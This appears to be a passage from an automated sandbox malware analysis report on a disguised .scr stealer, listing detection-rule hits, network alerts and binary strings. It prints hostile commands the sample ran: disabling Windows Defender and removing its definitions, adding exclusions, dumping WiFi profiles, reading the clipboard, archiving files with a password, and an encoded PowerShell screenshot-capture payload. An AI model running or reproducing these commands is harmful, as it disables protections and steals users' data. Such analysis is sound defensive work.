AAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 6844, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'", ProcessId: 4432, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ProcessId: 5260, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7908, TargetFilename: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *, ProcessId: 7616, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 744, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 2860, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe", ParentImage: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe, ParentProcessId: 5260, ParentProcessName: #U202f#U202f#U2005#U00a0.scr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7592, ProcessName: cmd.exe
              No Snort rule has matched
              Timestamp:2024-08-04T02:22:28.590934+0200
              SID:2857752
              Source Port:443
              Destination Port:57967
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-04T02:22:27.754644+0200
              SID:2857751
              Source Port:57967
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: #U202f#U202f#U2005#U00a0.scr.exeAvira: detected
              Source: #U202f#U202f#U2005#U00a0.scr.exeReversingLabs: Detection: 71%
              Source: #U202f#U202f#U2005#U00a0.scr.exeVirustotal: Detection: 72%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: #U202f#U202f#U2005#U00a0.scr.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7E9901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,68_2_00007FF7F7E9901C
              Source: #U202f#U202f#U2005#U00a0.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdb source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342094311.00007FF8B9071000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340877451.00007FF8B8CB1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343290926.00007FF8B9F61000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.pdbhPu source: powershell.exe, 00000029.00000002.2158201728.0000015301604000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340338024.00007FF8B7EB3000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342474030.00007FF8B93C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333738469.00007FF8A819F000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
